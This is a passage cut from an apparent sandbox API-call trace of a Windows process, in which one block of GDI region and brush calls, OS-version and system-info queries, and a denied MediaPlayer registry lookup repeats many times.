hrgnSrc1=0x2d0401d6, hrgnSrc2=0x2f0401d3, iMode=4) returned 2 [0087.703] CreateSolidBrush (color=0xff) returned 0x2100a1c [0087.703] CreateSolidBrush (color=0xff0000) returned 0x1100a1f [0087.703] DeleteObject (ho=0x1100a1f) returned 1 [0087.703] DeleteObject (ho=0x2f0401d3) returned 1 [0087.704] DeleteObject (ho=0x2d0401d6) returned 1 [0087.704] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.704] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.704] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.704] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.704] BeginPath (hdc=0x0) returned 0 [0087.704] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.704] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.704] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.704] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.704] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x300401d3 [0087.704] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2e0401d6 [0087.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a20 [0087.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a21 [0087.704] CombineRgn (hrgnDst=0x1040a20, hrgnSrc1=0x300401d3, hrgnSrc2=0x2e0401d6, iMode=1) returned 1 [0087.704] CombineRgn (hrgnDst=0x1040a21, hrgnSrc1=0x300401d3, hrgnSrc2=0x2e0401d6, iMode=4) returned 2 [0087.704] CreateSolidBrush (color=0xff) returned 0x2100a1f [0087.704] CreateSolidBrush (color=0xff0000) returned 0x1100a22 [0087.704] DeleteObject (ho=0x1100a22) returned 1 [0087.704] DeleteObject (ho=0x2e0401d6) returned 1 [0087.704] DeleteObject (ho=0x300401d3) returned 1 [0087.704] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.704] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.704] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.704] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.704] BeginPath (hdc=0x0) returned 0 [0087.704] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.704] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.704] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.704] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.705] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2f0401d6 [0087.705] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x310401d3 [0087.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a23 [0087.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a24 [0087.705] CombineRgn (hrgnDst=0x1040a23, hrgnSrc1=0x2f0401d6, hrgnSrc2=0x310401d3, iMode=1) returned 1 [0087.705] CombineRgn (hrgnDst=0x1040a24, hrgnSrc1=0x2f0401d6, hrgnSrc2=0x310401d3, iMode=4) returned 2 [0087.705] CreateSolidBrush (color=0xff) returned 0x2100a22 [0087.705] CreateSolidBrush (color=0xff0000) returned 0x1100a25 [0087.705] DeleteObject (ho=0x1100a25) returned 1 [0087.705] DeleteObject (ho=0x310401d3) returned 1 [0087.705] DeleteObject (ho=0x2f0401d6) returned 1 [0087.705] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.705] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.705] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.705] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.705] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.705] BeginPath (hdc=0x0) returned 0 [0087.705] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.705] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.705] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.705] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.705] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.705] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.705] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x320401d3 [0087.705] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x300401d6 [0087.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a26 [0087.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a27 [0087.705] CombineRgn (hrgnDst=0x1040a26, hrgnSrc1=0x320401d3, hrgnSrc2=0x300401d6, iMode=1) returned 1 [0087.705] CombineRgn (hrgnDst=0x1040a27, hrgnSrc1=0x320401d3, hrgnSrc2=0x300401d6, iMode=4) returned 2 [0087.705] CreateSolidBrush (color=0xff) returned 0x2100a25 [0087.705] CreateSolidBrush (color=0xff0000) returned 0x1100a28 [0087.705] DeleteObject (ho=0x1100a28) returned 1 [0087.705] DeleteObject (ho=0x300401d6) returned 1 [0087.705] DeleteObject (ho=0x320401d3) returned 1 [0087.705] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.705] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.705] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.706] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.706] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.706] BeginPath (hdc=0x0) returned 0 [0087.706] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.706] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.706] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.706] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.706] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x310401d6 [0087.706] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x330401d3 [0087.706] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a29 [0087.706] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2a [0087.706] CombineRgn (hrgnDst=0x1040a29, hrgnSrc1=0x310401d6, hrgnSrc2=0x330401d3, iMode=1) returned 1 [0087.706] CombineRgn (hrgnDst=0x1040a2a, hrgnSrc1=0x310401d6, hrgnSrc2=0x330401d3, iMode=4) returned 2 [0087.706] CreateSolidBrush (color=0xff) returned 0x2100a28 [0087.706] CreateSolidBrush (color=0xff0000) returned 0x1100a2b [0087.706] DeleteObject (ho=0x1100a2b) returned 1 [0087.706] DeleteObject (ho=0x330401d3) returned 1 [0087.706] DeleteObject (ho=0x310401d6) returned 1 [0087.706] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.706] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.706] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.706] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.706] BeginPath (hdc=0x0) returned 0 [0087.706] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.706] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.706] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.706] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.706] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x340401d3 [0087.706] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x320401d6 [0087.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2c [0087.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2d [0087.707] CombineRgn (hrgnDst=0x1040a2c, hrgnSrc1=0x340401d3, hrgnSrc2=0x320401d6, iMode=1) returned 1 [0087.707] CombineRgn (hrgnDst=0x1040a2d, hrgnSrc1=0x340401d3, hrgnSrc2=0x320401d6, iMode=4) returned 2 [0087.707] CreateSolidBrush (color=0xff) returned 0x2100a2b [0087.707] CreateSolidBrush (color=0xff0000) returned 0x1100a2e [0087.707] DeleteObject (ho=0x1100a2e) returned 1 [0087.707] DeleteObject (ho=0x320401d6) returned 1 [0087.707] DeleteObject (ho=0x340401d3) returned 1 [0087.707] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.707] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.707] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.707] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.707] BeginPath (hdc=0x0) returned 0 [0087.707] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.707] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.707] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.707] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.707] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x330401d6 [0087.707] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x350401d3 [0087.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a2f [0087.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a30 [0087.707] CombineRgn (hrgnDst=0x1040a2f, hrgnSrc1=0x330401d6, hrgnSrc2=0x350401d3, iMode=1) returned 1 [0087.707] CombineRgn (hrgnDst=0x1040a30, hrgnSrc1=0x330401d6, hrgnSrc2=0x350401d3, iMode=4) returned 2 [0087.707] CreateSolidBrush (color=0xff) returned 0x2100a2e [0087.707] CreateSolidBrush (color=0xff0000) returned 0x1100a31 [0087.707] DeleteObject (ho=0x1100a31) returned 1 [0087.707] DeleteObject (ho=0x350401d3) returned 1 [0087.707] DeleteObject (ho=0x330401d6) returned 1 [0087.707] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.707] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.707] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.707] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.707] BeginPath (hdc=0x0) returned 0 [0087.707] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.707] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.708] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.708] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.708] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x360401d3 [0087.708] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x340401d6 [0087.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a32 [0087.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a33 [0087.708] CombineRgn (hrgnDst=0x1040a32, hrgnSrc1=0x360401d3, hrgnSrc2=0x340401d6, iMode=1) returned 1 [0087.708] CombineRgn (hrgnDst=0x1040a33, hrgnSrc1=0x360401d3, hrgnSrc2=0x340401d6, iMode=4) returned 2 [0087.708] CreateSolidBrush (color=0xff) returned 0x2100a31 [0087.708] CreateSolidBrush (color=0xff0000) returned 0x1100a34 [0087.708] DeleteObject (ho=0x1100a34) returned 1 [0087.708] DeleteObject (ho=0x340401d6) returned 1 [0087.708] DeleteObject (ho=0x360401d3) returned 1 [0087.708] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.708] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.708] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.708] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.708] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.708] BeginPath (hdc=0x0) returned 0 [0087.708] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.708] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.708] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.708] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.708] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.708] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401d6 [0087.708] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401d3 [0087.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a35 [0087.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a36 [0087.708] CombineRgn (hrgnDst=0x1040a35, hrgnSrc1=0x350401d6, hrgnSrc2=0x370401d3, iMode=1) returned 1 [0087.708] CombineRgn (hrgnDst=0x1040a36, hrgnSrc1=0x350401d6, hrgnSrc2=0x370401d3, iMode=4) returned 2 [0087.708] CreateSolidBrush (color=0xff) returned 0x2100a34 [0087.708] CreateSolidBrush (color=0xff0000) returned 0x1100a37 [0087.708] DeleteObject (ho=0x1100a37) returned 1 [0087.709] DeleteObject (ho=0x370401d3) returned 1 [0087.709] DeleteObject (ho=0x350401d6) returned 1 [0087.709] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.709] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.709] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.709] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.709] BeginPath (hdc=0x0) returned 0 [0087.709] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.709] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.709] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.709] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.709] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.709] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401d3 [0087.709] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401d6 [0087.709] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a38 [0087.709] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a39 [0087.709] CombineRgn (hrgnDst=0x1040a38, hrgnSrc1=0x380401d3, hrgnSrc2=0x360401d6, iMode=1) returned 1 [0087.709] CombineRgn (hrgnDst=0x1040a39, hrgnSrc1=0x380401d3, hrgnSrc2=0x360401d6, iMode=4) returned 2 [0087.709] CreateSolidBrush (color=0xff) returned 0x2100a37 [0087.709] CreateSolidBrush (color=0xff0000) returned 0x1100a3a [0087.709] DeleteObject (ho=0x1100a3a) returned 1 [0087.709] DeleteObject (ho=0x360401d6) returned 1 [0087.709] DeleteObject (ho=0x380401d3) returned 1 [0087.709] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.709] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, 